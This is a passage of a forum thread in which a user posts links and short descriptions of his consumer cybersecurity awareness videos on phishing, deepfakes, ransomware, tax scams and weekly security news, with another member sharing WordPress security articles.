Think Before You Click: Be wary of suspicious links and offers that seem too good to be true to avoid scams and malware.
Report and Support: If you encounter harmful content or behavior, report it to the platform and support those affected.
Remember, a safer internet is not just a one-day affair but a continuous journey. Let's join hands and pledge to make every day a Safer Internet Day!
For more information and resources, visit the official Safer Internet Day websites:
https://www.saferinternetday.org/ (https://www.saferinternetday.org/)
-
Deepfakes Gone Deep -
When Can You Believe What You See Online?
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/06/17/22/cZn1b3VdFvj/preview.jpg)
https://youtu.be/D6JsomMlWIU (https://youtu.be/D6JsomMlWIU)
The Future of Deepfakes - Deepfakes are here to stay, and their potential impact is immense.
I used Google's Bard and Pictory.ai to create the video. https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
Keep up the good work, Bob. Appreciate you.
-
Keep up the good work, Bob. Appreciate you.
Thanks, I appreciate that. :)
-
Phishing Email - Don't get Hooked
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/08/14/31/cZnj2wVdTCz/preview.jpg)
https://youtu.be/FZnoOS4ZXXc (https://youtu.be/FZnoOS4ZXXc)
Dissecting a phishing email. What you should look for,
what to avoid and what to do after you've received it.
Phishing is the most prevalent form of malware in 2024.
You are the bait, but you don't have to fall for it.
-
Weekly Security News Roundup WE 2-9-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/10/01/07/cZn6ViVdvSo/preview.jpg)
https://youtu.be/xW5Uj0Yk4rk (https://youtu.be/xW5Uj0Yk4rk)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
The Dark Web Explained: What It Is and How to Stay Safe
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/11/17/14/cZnXb2VdxSw/preview.jpg)
https://youtu.be/AKN3Rhdyui4 (https://youtu.be/AKN3Rhdyui4)
The Dark Web is a complex and multifaceted part of the internet.
While it can be a tool for privacy and free speech, it also harbors
dangers that require careful navigation.
I used Copilot and Pictory.ai as aids in creating this video.
https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
Cybersecurity Hygiene - Essential Practices to Stay Safe Online
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/12/22/34/cZnl34VdA3T/preview.jpg)
https://youtu.be/E5bIzyfQEB8 (https://youtu.be/E5bIzyfQEB8)
Cybersecurity hygiene doesn't need to be complicated or overwhelming.
By building the habits outlined in this video into your digital life,
you significantly reduce your risk of falling victim to cyberattacks.
I used Gemini and Pictory.ai to help with the creation of this video.
https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
Don't Let a Hacker Steal Your Heart This Valentine's Day
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/13/14/29/cZnI2UVdgCH/preview.jpg)
https://youtu.be/C4gOsce5EtQ (https://youtu.be/C4gOsce5EtQ)
Love Wisely Online - This Valentine's Day, while you're searching for love
or celebrating it, remember to stay cyber safe. I used Copilot, Gemini and Pictory.ai
to help with the creation of this video. https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
Tax season is here - so are the Cybercrooks
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/14/16/28/cZn2DuVd57h/preview.jpg)
https://youtu.be/JmTWyx-UpMU (https://youtu.be/JmTWyx-UpMU)
Here's some advice so you can go ahead and file those taxes with confidence,
and let the cybercrooks know that when it comes to your personal information,
the joke’s on them!
I used Copilot and Pictory.ai to help with the creation of this video.
https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
Here's another Phishing email not caught by Gmail.
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/16/00/56/cZnDc8VdJ80/preview.jpg)
-
Weekly Security News Roundup WE 2-16-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/17/14/34/cZnb24Vds9u/preview.jpg)
https://youtu.be/lVvunnHZ1i4
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU)
https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian
-
Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU)
https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian (https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian)
It was one of the items covered in my Security News Roundup. :)
-
More Spam not caught by Gmail
-
Weekly Security News Roundup WE 2-23-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/23/16/36/cZn0DzVKXg1/preview.jpg)
https://youtu.be/XHhG5cg23DI (https://youtu.be/XHhG5cg23DI)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Is the US-World Healthcare Infrastructure Under Attack?
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/24/15/00/cZnZocVKIOp/preview.jpg)
https://youtu.be/_KbCfQSiSiI (https://youtu.be/_KbCfQSiSiI)
The rise in cyberattacks on healthcare infrastructure is a concerning trend
that underscores the need for robust cybersecurity measures and public awareness.
I used Copilot, Gemini, and Pictory.ai to help in the creation of this video.
https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
Ransomware Resurgence -
Preparing for the Inevitable Attack
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/26/14/48/cZnO2JVKb8k/preview.jpg)
https://youtu.be/IIdYk0O5eqw
Ransomware is a constantly evolving threat. Stay vigilant and follow the
advice offered in this video. I used Copilot and Pictory.ai to help in the
creation of this video. https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
How to Protect Against W-2 Phishing Scams
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/27/23/04/cZnt0fVK0Eq/preview.jpg)
https://youtu.be/akSL95Au05s (https://youtu.be/akSL95Au05s)
Stay safe, stay secure and realize that early detection of suspicious activity can prevent
further damage and lead to quicker resolution.
My thanks to Emma McGowan for her article on the Avast Blog and the idea for this video.
You'll find her article at: https://blog.avast.com/w-2-phishing-scams (https://blog.avast.com/w-2-phishing-scams).
I used Copilot and Pictory.ai to help in the creation of this video.
Please use the following link if you're interested in Pictory.ai: https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
The Deepfake Dilemma - A Closer Look
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/28/21/09/cZnurQVKt4F/preview.jpg)
https://youtu.be/5aQSmWcOZw4 (https://youtu.be/5aQSmWcOZw4)
Remember, in a world where videos can lie # your critical thinking is your superpower.
Use it wisely # and don't forget to laugh along the way.
I used Copilot and Pictory.ai to help in the creation of this video.
If you're interested in trying Pictory.ai please use the following link.
https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
Algorithms - The Good the Bad the Ugly
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/01/00/37/cZeVcAVKx22/preview.jpg)
https://youtu.be/lrIjEz4Zc7o (https://youtu.be/lrIjEz4Zc7o)
This video underscores the importance of ethical considerations in algorithm design
to ensure that as we advance technologically responsibly.
I used Copilot and Pictory.ai to help in the creation of this video.
If you're interested in trying Pictory.ai please use the following link.
https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
Weekly Security News Roundup WE 3-1-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/02/02/24/cZennZVKaSD/preview.jpg)
https://youtu.be/Z5GSqmn6DLg (https://youtu.be/Z5GSqmn6DLg)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Securing the Cloud
Navigating the Sky of Data Protection
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/03/17/31/cZeebwVKARA/preview.jpg)
https://youtu.be/q3w9CzxWoE8 (https://youtu.be/q3w9CzxWoE8)
By understanding the complexities of cloud security, preparing for data breaches,
and adhering to compliance standards, they can ensure that their journey through the cloud
is both secure and compliant, protecting their most valuable asset: data.
I used Copilot and Pictory.ai to help in the creation of this video.
If you're interested in trying Pictory.ai please use the following link.
https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
The Perils of Ancient Androids
A Lighthearted Look at Android Outdated Tech
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/05/21/16/cZehrDVKmTe/preview.jpg)
https://youtu.be/j2BTdG0MRL0
Stay safe, stay secure and please update that ancient android device
to keep yourself safe and the bad guys at bay.
I used Copilot and Pictory.ai to help in the creation of this video.
If you're interested in trying Pictory.ai please use the following link.
https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
Infested WordPress-sites let browsers attack visitors:
https://blog.sucuri.net/2024/03/from-web3-drainer-to-distributed-wordpress-brute-force-attack.html
polonus
-
TikTok - The Newsroom of Today
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/08/13/38/cZejIBVKPXX/preview.jpg)
https://youtu.be/OWvhuxNADDU (https://youtu.be/OWvhuxNADDU)
Stay safe, stay secure and remember, in the fast-paced world of social media,
a little fact-checking goes a long way and TikTok isn't where you should get your news.
I used Copilot and Pictory.ai to help in the creation of this video.
If you're interested in trying Pictory.ai please use the following link.
https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
Weekly Security News Roundup WE 3-3-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/08/20/43/cZejY5VK90N/preview.jpg)
https://youtu.be/If3QG8OTvC4 (https://youtu.be/If3QG8OTvC4)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
If you find my videos helpful, please buy me a cup of coffee -
https://ko-fi.com/bob3160 (https://ko-fi.com/bob3160)
-
Understanding TikTok’s Data Dilemma
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/09/19/53/cZeQqMVKRNZ/preview.jpg)
https://youtu.be/MhPfN8D9jyA (https://youtu.be/MhPfN8D9jyA)
Banning TikTok might provide a temporary sense of action,
but it’s unlikely to cure the ills of social media apps.
Figuring out what to do about TikTok isn’t just about one app.
It’s about how we handle privacy and data security in the digital age.
I used Copilot and Pictory.ai to help in the creation of this video.
If you're interested in trying Pictory.ai please use the following link.
https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
Again thousands of WordPress website with vulnerable Popup-Builder:
https://wordpress.org/plugins/popup-builder/advanced/
Scan your WP website here: https://hackertarget.com/wordpress-security-scan/
WP websites demand maintenance. User enumeration and directory listing should be set to disabled.
One cannot asume one is protected by just by sitting in the cloud.
polonus
-
Again thousands of WordPress website with vulnerable Popup-Builder:
https://wordpress.org/plugins/popup-builder/advanced/ (https://wordpress.org/plugins/popup-builder/advanced/)
Scan your WP website here: https://hackertarget.com/wordpress-security-scan/ (https://hackertarget.com/wordpress-security-scan/)
WP websites demand maintenance. User enumeration and directory listing should be set to disabled.
One cannot asume one is protected by just by sitting in the cloud.
polonus
I don't use any add-ons or plugins on my site. :)(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/12/13/36/cZelIzV7hmW/preview.jpg)
-
Weekly Security News Roundup WE 3-15-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/15/18/12/cZeoFlV7FaU/preview.jpg)
https://youtu.be/qg2ezN_RR-A (https://youtu.be/qg2ezN_RR-A)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.